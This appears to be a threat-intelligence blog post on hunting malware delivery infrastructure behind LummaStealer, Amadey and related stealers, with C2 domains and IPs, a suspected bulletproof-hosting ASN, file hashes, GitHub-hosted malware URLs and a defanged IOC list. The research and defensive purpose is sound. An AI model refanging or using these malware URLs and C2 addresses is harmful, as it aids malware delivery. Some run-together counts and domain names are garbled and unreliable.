Details

Hunting for new malware delivery infrastructure often entails the identification and tracking of common techniques to deliver various stages of malware. Take malware-as-a-service providers for instance, some commonalities in a recent activity cluster entailed the use of hosted powershell scripts acting as a reference to the next malware to download and execute. 

Multiple clusters of stealer activity were observed through early July using PowerShell scripts as an intermediate stage for malware delivery. Creating multiple stages of delivery reduces the initial risk of exposing all malware and associated infrastructure if it is detected early on in execution. It may also slow down response investigations and analysis. 

Hunting for malicious web hosted PowerShell scripts can be as simple as using a Shodan query such as: http.html:”Invoke-WebRequest”.

Example Finding:
77.110.118.195 Resolved malicious domain “alababababa[.]cloud”.

A reused web-hosted powershell script to retrieve a malicious executable, build.exe, which it then starts as a new process.

Filename: build.exe
Sha256: 7ada4d7dfc00943780cb51ea182c7a221953cdabc394011204ba5cd8e4e8f0d3

This script acts as a trojan and connects to a commonly used C2 domain “anodes[.]pro”, which has communicated with more than60 malicious files in the past 2 months, including multiple stealer malware families such as Amadey, Lumma,  Luca, DeerStealer, and RedLine as well as other malware families Rugmi, BlackBasta and DarkGate.

Expanding on the domain behavior in VirusTotal, one additional DeerStealer sample was identified, which also used the same C2 domain. 

Sha256: bd269a6328de0e534f4d8c3a42ea88a4343168053f63da0da95318f4ed17e705

Expanding on the associated infrastructure of the identified intermediary domain “alababababa[.]cloud” through domain registration overlaps identified potentially related activity.

• NameServer: cloudflare[.]com
• IP ISP: CloudFlare Inc
• Address: compliance_abuse[@]webnic[.]cc
• Registrar: WebNIC
• SSL Issuer: WE1

alababababa[.]cloud hugevcdn[.]pro anodes[.]pro servicesmesh[.]pro interconstructionsite[.]pro zurichinsurince[.]com zhuchengsantian[.]com

Repeating the previous steps identifies additional malware with commonalities in stealer and C2 usage such as Amadey malware being observed with domain “hugevcdn[.]pro”.

Sha256: 02c158c63d28fd5be24424e41b70a7a361c9be8897590c0453b0d30bd6e0d842
C2: “185.156.72[.]96/te4h2nus/index.php

Similar but considerably higher volume to the C2 domain “anodes[.].pro”, the C2 IP 185.156.72[.]96 has been observed with over 2,700 malicious files communicating to it. Notably with many of the same wide range of malware-as-a-service families using it as a C2.  

In addition, many of the malicious files for LummaStealer and Amadey shared a common C2 IP “185.156.72[.]96” and overlaps with a previous LummaStealer IP “185.156.72[.]2”.

Both IPs are part of an obscure ASN (AS61432) TOV VAIZ PARTNER. This ASN has only one prefix (185.156.72.0/24), which shows only 1 out 719 BGP peer propagations for Hurricane Electric Services. The ASN claims Ukrainian origin and appears to only be propagated by 1 other ASN, AS50073 Webcraft Found LLC in Ukraine. This may generally suggest the ASN is part of a BPHS, bulletproof hosting service.

Example LummaStealer C2s associated to IP 185.156.72[.]2 and 185.156.72[.]96 and anodes[.]pro

0a401e0be28cb02b549b63db4681a881ec03091ca058103debe30ef20070aba230dd56520191f9ac29e7eb87c3e428dec6c3ea90baca523ec46f9ce58c6179210dd80560bfc501a9bcdcc45e76b232655eb8cba78d09a8414dc77236a3ead1741149a01c5c8a3870ba40ca68f8e801cc38e5542c1938ed7ee01b14cf2e571258293bf1f2b901f02f23af5c9221989ac82f27b2de061d7df9a035e09e713f914d hxxps[:]//battlefled[.]top/gaoi hxxps[:]//citellcagt[.]top/gjtu hxxps[:]//diecam[.]top/laur/api hxxps[:]//escczlv[.]top/bufi hxxps[:]//korxddl[.]top/qidz hxxps[:]//localixbiw[.]top/zlpa hxxps[:]//narrathfpt[.]top/tekq hxxps[:]//peppinqikp[.]xyz/xaow hxxps[:]//sstemxehg[.]shop/gaks hxxps[:]//stochalyqp[.]xyz/alfp

Noting a reused SSH certificate “hash:896675070” and “hash:-434889431” from the C2 IP address identifies several historic overlaps such as the following recent IPs:

185.156.72[.]97 > 0176.46.157[.]50 > 570 malicious communicating files185.156.72[.]96 > 2,800 malicious communicating files66.114.52[.]156 > 1 malicious communicating files176.46.157[.]32 > 660 malicious communicating files

In addition to indications that the large cluster of malware employs Amazon CloudFront, Amazon Global Accelerator EC2s, and Github user content being used to store and distribute malware. All of which create challenges in proactively blocking malicious domains.

Example 1:
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/36b05b6030459ba5435705d8b91aae11f0ba268b/NIOAHYWM.exe
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/6fd8d0859aa9d3d300bf79f3da8032b04b1ed540/OURDUBDV.exe
https[:]//github[.]com/peterson643eu/projecttop/raw/refs/heads/main/OURDUBDV.exe

Makes request to http[:]//nexuswarps[.]shop/c
C2s: anodes[.]pro, multiport[.]shop

SSL Hash overlaps with a CloudFront IP resolving “70d9ae273c860e606f236c528381f9ca[.]cloudfront[.]net” suggests the CloudFront service may be used to relay traffic to another endpoint serving malware.

Sampling 200 of the communicating files with meaningful detection names in VirusTotal and limiting to the past 3 months there is an overrepresentative share of LummaC2 and Amadey.

Despite law enforcement takedowns targeting LummaStealer infrastructure in May 2025, it appears Lumma is still operating and continues to be a prominent choice. Though we speculate that this particular cluster of malicious activity decidedly experimented with alternative choices during the month of June and may have opted to continue operations with LummaStealer.  

Conclusion

Despite a May 2025 law enforcement takedown targeting LummaStealer, the malware family appears to remain active and a popular choice for threat actors, particularly through bulletproof hosting services (BPHS) IPs. This analysis of observed malicious activity, with a focus on C2 IPs 185.156.72[.]96 and 185.156.72[.]2 (both part of AS61432, a suspected BPHS), suggests that while there may have been some experimentation with alternative malware during June, operations have largely continued with LummaStealer.

IOCs

kinwlyo[.]xyz sstemxehg[.]shop anodes[.]pro stochalyqp[.]xyz peppinqikp[.]xyz financialway[.]pro alababababa[.]cloud chainnode[.]shop multiport[.]shop battlefled[.]top localixbiw[.]top korxddl[.]top diecam[.]top escczlv[.]top citellcagt[.]top narrathfpt[.]top zurichinsurince[.]com zhuchengsantian[.]com metaskins[.]gg blogcrptodevelopments[.]com ripple-regulatory[.]com ripple-legal[.]com ripple-regulation[.]com cfd-regulations[.]com avatrade-supervision[.]com avatrade-global[.]com londonoffvisit[.]com avatrade-regulation[.]com avatrade-compliance[.]com avatrade-services[.]com betrunk[.]rocks hugevcdn[.]pro mary-mijote[.]frs ervicesmesh[.]pro interconstructionsite[.]pro osuszaczemlawa[.]pl registrokim[.]online orlideti[.]com